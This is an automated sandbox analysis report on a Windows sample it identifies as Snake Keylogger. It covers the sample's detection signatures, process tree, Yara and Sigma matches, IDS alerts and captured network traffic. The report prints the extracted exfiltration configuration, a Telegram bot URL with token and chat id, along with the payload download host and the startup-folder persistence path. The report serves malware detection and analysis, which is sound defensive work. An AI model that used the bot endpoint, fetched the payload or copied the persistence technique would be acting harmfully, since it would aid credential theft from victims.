Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ 4748.exe

Overview

General Information

Sample name:RFQ 4748.exe
Analysis ID:1551956
MD5:ad61c5c16181fe8ce8fe58ab4bf3d15d
SHA1:656ccb4712cb709b217da2341e3f6069caebf0fb
SHA256:e7c828d9806cfaaa5251e8dfd14b76835a2e8f661ad392de85c6a93059202f40
Tags:exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ 4748.exe (PID: 5272 cmdline: "C:\Users\user\Desktop\RFQ 4748.exe" MD5: AD61C5C16181FE8CE8FE58AB4BF3D15D)
    • InstallUtil.exe (PID: 360 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 3092 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Fallback.exe (PID: 1096 cmdline: "C:\Users\user\AppData\Roaming\Fallback.exe" MD5: AD61C5C16181FE8CE8FE58AB4BF3D15D)
      • InstallUtil.exe (PID: 3652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7690586559:AAHjgfU-aDw_iLX-s_ri6LZhjXJ7Pf6Mo9Y/sendMessage?chat_id=6008123474", "Token": "7690586559:AAHjgfU-aDw_iLX-s_ri6LZhjXJ7Pf6Mo9Y", "Chat_id": "6008123474", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
    • 0x8b8:$x1: $%SMTPDV$
    • 0x860:$x3: %FTPDV$
    • 0x884:$m2: Clipboard Logs ID
    • 0xac2:$m2: Screenshot Logs ID
    • 0xbd2:$m2: keystroke Logs ID
    • 0xeac:$m3: SnakePW
    • 0xa9a:$m4: \SnakeKeylogger\
    00000002.00000002.4492614618.0000000000419000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 44 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.RFQ 4748.exe.6b60000.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            5.2.Fallback.exe.438fdb0.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              5.2.Fallback.exe.438fdb0.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                5.2.Fallback.exe.438fdb0.1.raw.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                  5.2.Fallback.exe.438fdb0.1.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x14ab7:$a1: get_encryptedPassword
                  • 0x14da3:$a2: get_encryptedUsername
                  • 0x148c3:$a3: get_timePasswordChanged
                  • 0x149be:$a4: get_passwordField
                  • 0x14acd:$a5: set_encryptedPassword
                  • 0x16161:$a7: get_logins
                  • 0x160c4:$a10: KeyLoggerEventArgs
                  • 0x15d2f:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 39 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs" , ProcessId: 3092, ProcessName: wscript.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs" , ProcessId: 3092, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\RFQ 4748.exe, ProcessId: 5272, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-08T11:51:30.265429+010020229301A Network Trojan was detected20.109.210.53443192.168.2.549716TCP
                  2024-11-08T11:52:08.779079+010020229301A Network Trojan was detected20.109.210.53443192.168.2.549938TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-08T11:51:20.144257+010028033053Unknown Traffic192.168.2.549707188.114.96.3443TCP
                  2024-11-08T11:51:25.754181+010028033053Unknown Traffic192.168.2.549713188.114.96.3443TCP
                  2024-11-08T11:51:29.956391+010028033053Unknown Traffic192.168.2.549721188.114.96.3443TCP
                  2024-11-08T11:51:39.173813+010028033053Unknown Traffic192.168.2.549771188.114.96.3443TCP
                  2024-11-08T11:51:40.805290+010028033053Unknown Traffic192.168.2.549782188.114.96.3443TCP
                  2024-11-08T11:51:44.079836+010028033053Unknown Traffic192.168.2.549802188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-08T11:51:18.089032+010028032742Potentially Bad Traffic192.168.2.549705193.122.6.16880TCP
                  2024-11-08T11:51:19.401563+010028032742Potentially Bad Traffic192.168.2.549705193.122.6.16880TCP
                  2024-11-08T11:51:21.339167+010028032742Potentially Bad Traffic192.168.2.549708193.122.6.16880TCP
                  2024-11-08T11:51:37.385956+010028032742Potentially Bad Traffic192.168.2.549758193.122.6.16880TCP
                  2024-11-08T11:51:38.479711+010028032742Potentially Bad Traffic192.168.2.549758193.122.6.16880TCP
                  2024-11-08T11:51:40.089181+010028032742Potentially Bad Traffic192.168.2.549776193.122.6.16880TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: RFQ 4748.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeAvira: detection malicious, Label: HEUR/AGEN.1309900
                  Found malware configuration
                  Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7690586559:AAHjgfU-aDw_iLX-s_ri6LZhjXJ7Pf6Mo9Y/sendMessage?chat_id=6008123474", "Token": "7690586559:AAHjgfU-aDw_iLX-s_ri6LZhjXJ7Pf6Mo9Y", "Chat_id": "6008123474", "Version": "5.1"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeReversingLabs: Detection: 31%
                  Multi AV Scanner detection for submitted file
                  Source: RFQ 4748.exeReversingLabs: Detection: 31%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: RFQ 4748.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: RFQ 4748.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49765 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49722 version: TLS 1.2
                  Source: RFQ 4748.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ 4748.exe, 00000000.00000002.2089151863.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003E38000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2105699680.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003685000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ 4748.exe, RFQ 4748.exe, 00000000.00000002.2089151863.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003E38000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2105699680.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003685000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 4x nop then jmp 06AACE2Dh0_2_06AACA48
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 4x nop then jmp 06AACE2Dh0_2_06AACA38
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 4x nop then jmp 06ADC543h0_2_06ADC2A9
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 4x nop then jmp 06ADC543h0_2_06ADC1A0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 4x nop then jmp 06ADC543h0_2_06ADC1B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 029FF206h2_2_029FF017
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 029FFB90h2_2_029FF017
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_029FE538
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_029FEB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_029FED4C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06608945h2_2_06608608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06600B99h2_2_066008F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06605D19h2_2_06605A70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066058C1h2_2_06605618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06606171h2_2_06605EC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06606A21h2_2_06606778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066065C9h2_2_06606320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06606E79h2_2_06606BD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_066033A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_066033B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066002E9h2_2_06600040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066072FAh2_2_06607050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06607751h2_2_066074A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06600741h2_2_06600498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06600FF1h2_2_06600D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06608001h2_2_06607D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06607BA9h2_2_06607900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06608459h2_2_066081B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06605441h2_2_06605198
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 4x nop then jmp 06D6CE2Dh5_2_06D6CA48
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 4x nop then jmp 06D6CE2Dh5_2_06D6CA38
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 4x nop then jmp 06D9C543h5_2_06D9C2A9
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 4x nop then jmp 06D9C543h5_2_06D9C1B0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 4x nop then jmp 06D9C543h5_2_06D9C1A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00ECF1F6h6_2_00ECF007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00ECFB80h6_2_00ECF007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_00ECE528
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_00ECEB5B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_00ECED3C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06418945h6_2_06418608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06415D19h6_2_06415A70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064158C1h6_2_06415618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06416171h6_2_06415EC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06416A21h6_2_06416778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064165C9h6_2_06416320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06416E79h6_2_06416BD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_064133A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_064133B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064102E9h6_2_06410040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064172FAh6_2_06417050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06410B99h6_2_064108F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06410741h6_2_06410498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06417751h6_2_064174A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06410FF1h6_2_06410D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06418001h6_2_06417D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06417BA9h6_2_06417900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06415441h6_2_06415198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06418459h6_2_064181B0

                  Networking

                  barindex
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /slim/Knlpdavcfrw.vdf HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /slim/Knlpdavcfrw.vdf HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49758 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49776 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49771 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49782 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49802 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49938
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49716
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
